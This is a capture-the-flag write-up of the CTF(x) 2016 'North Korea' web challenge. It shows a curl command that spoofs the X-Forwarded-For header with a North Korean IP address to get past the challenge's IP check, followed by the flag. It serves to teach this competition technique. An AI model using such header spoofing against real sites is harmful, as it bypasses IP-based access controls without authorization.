CTF(x) 2016 - North Korea (Web) - Nandy Narwhals CTF Team ▌

Fake an originating IP address from North Korea using the X-Forwarded-For header.

Solution

Pretty easy challenge. We need to fake our originating IP address to the site using the X-Forwarded-For header. Obviously, we should use an IP address within the North Korean range.

amon@Evanna:~/ctf/ctfx/web/northkorea$ curl 'http://problems.ctfx.io:7002/code'  \
-H 'DNT: 1' -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Languq=0.8,en-GB;q=0.6' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' \
-H 'Accept: */*' -H 'Referer: http://problems.ctfx.io:7002/' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' --compressed -H 'X-Forwarded-For: 175.45.177.0'
ctf(jk_we_aint_got_n0_nuk35)

Flag: ctf(jk_we_aint_got_n0_nuk35)

Share on

Twitter Facebook Google+ LinkedIn

CTF(x) 2016 - North Korea (Web)

amon (j. heng)

Solution

Share on

Leave a Comment

You May Also Enjoy

Cyberpeace 2022 - Crysys (Pwn)

TetCTF 2022 - Newbie (Pwn)

TetCTF 2022 - EzFlag (Web/Pwn)

Sieberrsec 3.0 CTF (2021) - Turbo Fast Crypto (Crypto/Pwn)